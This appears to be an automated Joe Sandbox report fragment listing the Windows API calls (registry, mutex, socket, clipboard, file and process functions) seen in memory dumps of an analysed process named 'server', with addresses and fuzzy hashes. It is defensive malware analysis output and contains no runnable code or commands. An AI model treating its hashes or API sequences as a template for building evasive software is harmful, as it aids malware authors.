              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: fb3565096eca0466eea5728ed5263ac251fb50a38fd3a4da7e1ad1069de94baf
              • Instruction ID: d8d9f0d8d56824469e753a9ef7f495faacbe1f050cce88793880e562260aa3e8
              • Opcode Fuzzy Hash: fb3565096eca0466eea5728ed5263ac251fb50a38fd3a4da7e1ad1069de94baf
              • Instruction Fuzzy Hash: F831A4715083806FE7238B60DC54FA6BFB8EF07224F0945DBE584DB563D224A909C772
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E90,?,?), ref: 03AA0EA2
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 9d7783929f5662ee3cd432a2c2457e27b1b2052b1aa5122aabe682c57bc00610
              • Instruction ID: 30c490f4b3547e2a2646249942fe0a82854b38b0eb8f778b9d15e4e15cf2f1e8
              • Opcode Fuzzy Hash: 9d7783929f5662ee3cd432a2c2457e27b1b2052b1aa5122aabe682c57bc00610
              • Instruction Fuzzy Hash: F0318B6110E7C06FD3138B258C61A62BF74EF47614F0E85CBD8848F6A3D2296919D7B2
              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00D9AB25
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: f49ac353097d2786a26d4399d63b782634ba935adefea6bb35b2d4b3678d752c
              • Instruction ID: bd1a1cf4391d8062d36251cdeef0ebad66cd38b6c483a99c65024f7cf631cb9a
              • Opcode Fuzzy Hash: f49ac353097d2786a26d4399d63b782634ba935adefea6bb35b2d4b3678d752c
              • Instruction Fuzzy Hash: 4E318071504380AFEB21CF25CC85F56BFF8EF05324F08849AE9858B662D365E808CB72
              APIs
              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E90), ref: 03AA1403
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: DescriptorSecurity$ConvertString
              • String ID:
              • API String ID: 3907675253-0
              • Opcode ID: 48e05a87e364f43dadbc994194953d4fb59c5ec17354886c83054860460e7e58
              • Instruction ID: 3d417dbd0388dd9345d1777bba6021ee91112b7b1c7fbd2c38722ddd5af916e7
              • Opcode Fuzzy Hash: 48e05a87e364f43dadbc994194953d4fb59c5ec17354886c83054860460e7e58
              • Instruction Fuzzy Hash: 97318E72504384AFE721CF65DC45FA6BFBCEF05224F08849AE948DB662D364A909CB71
              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 00D9B01D
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: f51b90e6e4ce46859fc22d4fac2329ed5289f83c52c7ae5244ed61327510e0d2
              • Instruction ID: 61a3efd7cb3a2f6e3c6303a16004fbbbde3ef45ddc1206e5d5bcb6597bc69eac
              • Opcode Fuzzy Hash: f51b90e6e4ce46859fc22d4fac2329ed5289f83c52c7ae5244ed61327510e0d2
              • Instruction Fuzzy Hash: DD3193715093806FE711CF25DC45F96FFB8EF06314F09849AE988CB2A2D365A909C772
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9B2F8
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: e7e2b06a7062bd080a7288a7185ebc378ca11b8793732cbc7f8ae05896bfc12a
              • Instruction ID: f59cd90157ef0b1df44ddbe9b64bc8d9237b75f99e6e1bcb85cfa2553be129ea
              • Opcode Fuzzy Hash: e7e2b06a7062bd080a7288a7185ebc378ca11b8793732cbc7f8ae05896bfc12a
              • Instruction Fuzzy Hash: D831A1751093846FEB22CF21DC45FA6BFACEF06324F08849AE8458B162D364E908CB71
              APIs
              • GetProcessTimes.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1B0D
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: ProcessTimes
              • String ID:
              • API String ID: 1995159646-0
              • Opcode ID: c14e9dedfd61f968ad8a8e856a25c19e5fdfe2b3e7dd03233d1434ed1fc3ecc3
              • Instruction ID: fb3ae3bb7d399479eda5b5e7ef2f8c750e5b2c70534659c5c4ff685394440a04
              • Opcode Fuzzy Hash: c14e9dedfd61f968ad8a8e856a25c19e5fdfe2b3e7dd03233d1434ed1fc3ecc3
              • Instruction Fuzzy Hash: 4721E3725057806FEB128F20DC45F96BFBCEF06324F0884DAE9859B1A2D325A909C771
              APIs
              • FormatMessageW.KERNELBASE(?,00000E90,?,?), ref: 03AA1E66
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: FormatMessage
              • String ID:
              • API String ID: 1306739567-0
              • Opcode ID: d5d7bb203b3487c812f8dcd5b737dc1a5322e19343de55b049ee86e1f6b0f431
              • Instruction ID: bcae6f57b1fa6d77fdd98f88cbf7dec4b07ae0ed033655afb98c726b95f7e50d
              • Opcode Fuzzy Hash: d5d7bb203b3487c812f8dcd5b737dc1a5322e19343de55b049ee86e1f6b0f431
              • Instruction Fuzzy Hash: 01318E7150E3C06FD7038B258C51B66BFB8EF47610F0A84DBD8849F6A3D624691AC7B2
              APIs
              • OleGetClipboard.OLE32(?,00000E90,?,?), ref: 00D9A77E
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: Clipboard
              • String ID:
              • API String ID: 220874293-0
              • Opcode ID: 66685493705274ba58766b11276eb2db8969e2b30bffc248e7a5921739136f68
              • Instruction ID: fe9e9f6d81b06ba1609ec7aec3293dd850c621d2a7bd4158ca46451703eda798
              • Opcode Fuzzy Hash: 66685493705274ba58766b11276eb2db8969e2b30bffc248e7a5921739136f68
              • Instruction Fuzzy Hash: 4B31827114D3C06FD3138B259C61B61BFB4EF47614F0A80DBD884CB5A3D2696819D772
              APIs
              • SendMessageTimeoutA.USER32(?,00000E90), ref: 00D9B4D5
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: MessageSendTimeout
              • String ID:
              • API String ID: 1599653421-0
              • Opcode ID: 4582031fe6ad5588912154b19b902f735329ae56cef6339b43060b5d2c9994b1
              • Instruction ID: 33bbfd540b5969aa1a74ec70981b0fa338444c74ec9d840c6a93bb0c0eaff59c
              • Opcode Fuzzy Hash: 4582031fe6ad5588912154b19b902f735329ae56cef6339b43060b5d2c9994b1
              • Instruction Fuzzy Hash: A021E471104340AFEB228F21DC44FA2FFB8EF06320F08849AF9848B662D375A419DB71
              APIs
              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00D9BB4E
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 60fe04d3f0be4a0f43988ec0cd8795675307e5959298938c6dc7ffa4a8bcb96d
              • Instruction ID: 65efa11a5c8eb77565381ee5f66fe2ccd5ebeebb7bd31a4752d24a3b81078392
              • Opcode Fuzzy Hash: 60fe04d3f0be4a0f43988ec0cd8795675307e5959298938c6dc7ffa4a8bcb96d
              • Instruction Fuzzy Hash: 2C216B725093C09FDB128B65DC55B92BFB8AF13324F0E84DBD888CB5A3D2249809CB71
              APIs
              • WSASocketW.WS2_32(?,?,?,?,?), ref: 03AA0F5A
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: Socket
              • String ID:
              • API String ID: 38366605-0
              • Opcode ID: 120d311f800b22bc240c9aab28a59afa46121560fd0e10fa6abc69f82c6b781f
              • Instruction ID: 9bd7333b2106c3e484fff0702b4b4487065adabf8e5bb5a341aeeae366af4b5d
              • Opcode Fuzzy Hash: 120d311f800b22bc240c9aab28a59afa46121560fd0e10fa6abc69f82c6b781f
              • Instruction Fuzzy Hash: 4921A071409780AFE721CF55CC45F96FFB8EF05220F08889EE9858B662D375A418CB72
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: FileView
              • String ID:
              • API String ID: 3314676101-0
              • Opcode ID: 76445e7237a4c866d4239c1ea10b7f1641aa12d14b66764a7f1f5aab54ecbf9e
              • Instruction ID: 16324f881f577dac74f933ef7acbcf51103b6f7608b6fd82560eb83fda2820ab
              • Opcode Fuzzy Hash: 76445e7237a4c866d4239c1ea10b7f1641aa12d14b66764a7f1f5aab54ecbf9e
              • Instruction Fuzzy Hash: 8021A271504380AFE721CF15CC44F96FFBCEF05214F08849EE9858B652D365A508C772
              APIs
              • RegSetValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9B3E4
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: Value
              • String ID:
              • API String ID: 3702945584-0
              • Opcode ID: 907ca42fec1a8eaf5b6217b0285449840057fc6bc92f56d8b1b0af605fd6dae0
              • Instruction ID: 30a0c9a27945be06110aeff71dd4553ae8f7b02e5781d34821a052a092e5facc
              • Opcode Fuzzy Hash: 907ca42fec1a8eaf5b6217b0285449840057fc6bc92f56d8b1b0af605fd6dae0
              • Instruction Fuzzy Hash: 942181725043806FDB228F11DC45FA7BFBCEF45324F08849AE9858B662D364E808C771
              APIs
              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E90), ref: 03AA1403
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: DescriptorSecurity$ConvertString
              • String ID:
              • API String ID: 3907675253-0
              • Opcode ID: 8e88f09a86c6d36e285937b812baba05b1865e706a33c54b67b5b26c110a3d0b
              • Instruction ID: 24b8f9ee75929c88116a01eeb8f8fef82fce9964ee1a8b810eacecb447bf909b
              • Opcode Fuzzy Hash: 8e88f09a86c6d36e285937b812baba05b1865e706a33c54b67b5b26c110a3d0b
              • Instruction Fuzzy Hash: 0B21D472500704AFEB20CF29DC45FAAFBACEF00324F08846AE949DB651D364E409CBB1
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1318
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 75e194b305bac682bb0451010c56a9ca8c9708aa31fca1df10dd5264eacf198c
              • Instruction ID: d8b0be222e47758c8e29b0ef8102854c62ccf239f8fd972052f23ba1f24d6504
              • Opcode Fuzzy Hash: 75e194b305bac682bb0451010c56a9ca8c9708aa31fca1df10dd5264eacf198c
              • Instruction Fuzzy Hash: DC219C72504780AFE722CF15CC44F67FFBCAF45210F08849AE9858B6A2D365E808CB71
              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00D9AB25
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: c0f9167ac47a34ab95f9420c6e1170ffc66cc6ac0d4de8503cdabef8f4baeab7
              • Instruction ID: e68c0a53462f36573ae1df91cfb9dddbf4f61afde79f348eb375a6c344e7fca9
              • Opcode Fuzzy Hash: c0f9167ac47a34ab95f9420c6e1170ffc66cc6ac0d4de8503cdabef8f4baeab7
              • Instruction Fuzzy Hash: 08219276600240AFEB21CF65CC85F66FBE8EF04324F088959E9458B651D775E408DBB2
              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E90), ref: 00D9B1F5
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: eb86c8aa6a78c0e2a4db960dd24dfd1a38040fbc35339c2492047b051c78a788
              • Instruction ID: 8fc8716c230db7882d8ea2cf6babb10a4d0f70db026a67b209990ff5c65bfe93
              • Opcode Fuzzy Hash: eb86c8aa6a78c0e2a4db960dd24dfd1a38040fbc35339c2492047b051c78a788
              • Instruction Fuzzy Hash: FD21C072500304AEEB21DF51DC85FABFBACEF04724F08855AE945DB652D374E508CAB6
              APIs
              • GetProcessWorkingSetSize.KERNEL32(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1FF3
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: ProcessSizeWorking
              • String ID:
              • API String ID: 3584180929-0
              • Opcode ID: f58e73fa6caf6807360683517fcf5e0cb41be12797d2c24a96b0b7cb4366f4d8
              • Instruction ID: e8b2da63131079517d1df6b3d89c9809e528c4b1cfc68db3426e314d97f103c1
              • Opcode Fuzzy Hash: f58e73fa6caf6807360683517fcf5e0cb41be12797d2c24a96b0b7cb4366f4d8
              • Instruction Fuzzy Hash: 0721C2725057806FEB21CF25CC45F97BFACEF05214F08849BE944DB152D364A908CB76
              APIs
              • SetProcessWorkingSetSize.KERNEL32(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA20D7
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: ProcessSizeWorking
              • String ID:
              • API String ID: 3584180929-0
              • Opcode ID: f58e73fa6caf6807360683517fcf5e0cb41be12797d2c24a96b0b7cb4366f4d8
              • Instruction ID: 3da4e0ceb18fb1b95ce4713d947b7b42ff798415473001dbab9c069db231491e
              • Opcode Fuzzy Hash: f58e73fa6caf6807360683517fcf5e0cb41be12797d2c24a96b0b7cb4366f4d8
              • Instruction Fuzzy Hash: 2821C2725043806FEB12CF15CC45FA6BFACEF05214F0884ABE944DB152D374A508CB76
              APIs
              • ReadFile.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9AE4D
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: f9127c3fa18ad7e8d3c7b7d6e1969573400872f5a8360c9a9a265257d132482c
              • Instruction ID: 720b5c0af045fb70c05456cc8237ddf1d5a0f216189924ae0060be2eb4e0be03
              • Opcode Fuzzy Hash: f9127c3fa18ad7e8d3c7b7d6e1969573400872f5a8360c9a9a265257d132482c
              • Instruction Fuzzy Hash: EF21F672504340AFEB22CF51DC44FA7BFACEF45314F08849AF9449B552D275A908C7B2
              APIs
              • GetFileType.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9ACBD
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 8b113c963368c93c9481962687a8295649ccb49b3ba9e2ad1e2aacba7bb1fc20
              • Instruction ID: 07d1e070894ad8600ecf30aae06f8632d3a0a1494ecbbef52680e351002bc1b2
              • Opcode Fuzzy Hash: 8b113c963368c93c9481962687a8295649ccb49b3ba9e2ad1e2aacba7bb1fc20
              • Instruction Fuzzy Hash: DD21D8B65083806FE7128B11DC40BA2BFBCEF42314F0880D6E9848F253D264A909D772
              APIs
              • GetExitCodeProcess.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1F14
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: CodeExitProcess
              • String ID:
              • API String ID: 3861947596-0
              • Opcode ID: d730848597b3141f0bb856a08fbc0e9895f705ec93b5283f53211a8eb535c5b8
              • Instruction ID: d7071c02edd3894a212d4ecbbbb96bc78ac2db4c47a8dc6387a079169fcb4f88
              • Opcode Fuzzy Hash: d730848597b3141f0bb856a08fbc0e9895f705ec93b5283f53211a8eb535c5b8
              • Instruction Fuzzy Hash: 7021A1725053806FEB11CB15DC45F96BFACEF41224F08849BE948DB692D364A908C771
              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 00D9B01D
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: 390d3271954ce4016e4803624af557a4dac9e94e7d0535b350c7b5e6701512c0
              • Instruction ID: bba95c7025c305030388259a66a6a8d1f37516e88df19438dc741d1f3e809d1b
              • Opcode Fuzzy Hash: 390d3271954ce4016e4803624af557a4dac9e94e7d0535b350c7b5e6701512c0
              • Instruction Fuzzy Hash: 40218071600240AFEB20CF25DD85FA6FBE8EF05324F08846AE9498B651D775E909CA72
              APIs
              • SetErrorMode.KERNELBASE(?), ref: 00D9AA44
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 4135dbb613d8483493fb5344745faa466c3d95fe4789ad6ecd30eab2e159cee2
              • Instruction ID: 0f666f9fd7a0e8ee1febd1ed0920940ad8e13d132f424be5f96f5b1792a6b39c
              • Opcode Fuzzy Hash: 4135dbb613d8483493fb5344745faa466c3d95fe4789ad6ecd30eab2e159cee2
              • Instruction Fuzzy Hash: 2F21396540E3C0AFDB138B25DC55A51BF74EF53624F0E81DBD9848F5A3C2695809CB72
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9B2F8
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: e3599374560064402acf9cdc2ba99c545f4485f875dc5915a6c7e9e7f62a0913
              • Instruction ID: 10e7b2f8123a1ea895b7d757dcfe8ab6a09d04d5b6499e24cd916627bfa478d6
              • Opcode Fuzzy Hash: e3599374560064402acf9cdc2ba99c545f4485f875dc5915a6c7e9e7f62a0913
              • Instruction Fuzzy Hash: F8219075600204AFEB21CF15DD85FA7F7ECEF04724F08855AE945CB651D764E808CA75
              APIs
              • CopyFileW.KERNELBASE(?,?,?), ref: 00D9B78E
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: CopyFile
              • String ID:
              • API String ID: 1304948518-0
              • Opcode ID: 49f9977e26d6828e24b1abd898378cc788b730166bd3b8bc018b7dfa4fd462f4
              • Instruction ID: f157ebbfbf3b58192ac17be3e6726143eb9e035b519a1e401773d85ac2e844d3
              • Opcode Fuzzy Hash: 49f9977e26d6828e24b1abd898378cc788b730166bd3b8bc018b7dfa4fd462f4
              • Instruction Fuzzy Hash: 3B218171505380AFEB22CF65DC54B62BFA8EF46720F0885DAED85CB252D265E808D771
              APIs
              • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 03AA1CCA
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: Connect
              • String ID:
              • API String ID: 3144859779-0
              • Opcode ID: 7e79e9472884ba6a3aa10e40d17d237487f86bc1b1bdad179df336e7ed7c8488
              • Instruction ID: aa80a36faa5192a254423b955cebfa440c13a6654c0e220fe2a5a917f78c99d0
              • Opcode Fuzzy Hash: 7e79e9472884ba6a3aa10e40d17d237487f86bc1b1bdad179df336e7ed7c8488
              • Instruction Fuzzy Hash: 0521BE76409780AFDB22CF65CC84B92BFF4EF06310F0985DAE9858F162D375A809DB61
              APIs
              • DeleteFileW.KERNELBASE(?), ref: 00D9B908
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: a934c69f277bb1e4ad8a6966373a62cc95fad88d79ce2e7dd7a12f7ad1590ed7
              • Instruction ID: d373f8dbb42baaba97c5b3424c247c5ca270b64ab6fc4f3f761e65f769495a0c
              • Opcode Fuzzy Hash: a934c69f277bb1e4ad8a6966373a62cc95fad88d79ce2e7dd7a12f7ad1590ed7
              • Instruction Fuzzy Hash: 3A2181B65093805FDB12CB25DC45B52BFB8EF06324F0984DBED85CF163D2659908CB61
              APIs
              • WSASocketW.WS2_32(?,?,?,?,?), ref: 03AA0F5A
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: Socket
              • String ID:
              • API String ID: 38366605-0
              • Opcode ID: 3a5ca6c38b48f272bdcd8a9c5b288278e7d31743a1a4f14620c35d0ca28d3665
              • Instruction ID: e802ae97f710bdd93a50097ecc7cd28a8909378394381d673a906c450da5fa87
              • Opcode Fuzzy Hash: 3a5ca6c38b48f272bdcd8a9c5b288278e7d31743a1a4f14620c35d0ca28d3665
              • Instruction Fuzzy Hash: 95210172500600AFEB21CF55CC41F96FBA8EF08324F08889EE9858B661D376A419CB72
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: FileView
              • String ID:
              • API String ID: 3314676101-0
              • Opcode ID: 0a26a56f143b88d6e5f0be05b58c6918caefa98eb3e677ccc1bed83001df35b9
              • Instruction ID: 22843112485f567ee02197e9d34d60cf21a1570a215c032e4d8db20e665b261c
              • Opcode Fuzzy Hash: 0a26a56f143b88d6e5f0be05b58c6918caefa98eb3e677ccc1bed83001df35b9
              • Instruction Fuzzy Hash: DD219F76500640AFEB21CF15CC85F96FBECEF08224F04859AE9468B751E775E509CBB2
              APIs
              • K32EnumProcesses.KERNEL32(?,?,?,DFA40B92,00000000,?,?,?,?,?,?,?,?,6CD53C58), ref: 00D9BE42
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: EnumProcesses
              • String ID:
              • API String ID: 84517404-0
              • Opcode ID: c53b5fd6c2635c1ccf0c934f95b544016186a6fc86910d65f7cba11c8e9f9028
              • Instruction ID: 32a8f25ba820bf641445cacc783b8655f5aee93ad60be08ffa18564a32fac286
              • Opcode Fuzzy Hash: c53b5fd6c2635c1ccf0c934f95b544016186a6fc86910d65f7cba11c8e9f9028
              • Instruction Fuzzy Hash: 672150715093809FDB12CF25DC85B92BFB8EF06320F0984EAE985CB163D225A908CB61
              APIs
              • SendMessageTimeoutA.USER32(?,00000E90), ref: 00D9B4D5
              Memory Dump Source
              • Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d9a000_server.jbxd
              Similarity
              • API ID: MessageSendTimeout
              • String ID:
              • API String ID: 1599653421-0
              • Opcode ID: d2cc9d1f876e55167e567e5ccf0ee1473b22e03d75e4625d43ac4dee0c8020f6
              • Instruction ID: bfcba5530d80b8cbd152228c37b492723e63cf8bb9bdb8abca218314cc4a9672
              • Opcode Fuzzy Hash: d2cc9d1f876e55167e567e5ccf0ee1473b22e03d75e4625d43ac4dee0c8020f6
              • Instruction Fuzzy Hash: 6221E172500200AFEB318F11DC41FA6FBA8EF04724F18885AFE859B661D375E519DBB2
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1318
              Memory Dump Source
              • Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3aa0000_server.jbxd
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: baab47cd19a4a22d4430d6171b77a9d5e6ef00cd2f3e30a1fc166a62dea08c2d
              • Instruction ID: a74f85af49f283ca08c241f1735a246fc81d1355c9c24be234ed500b2e1d8f66
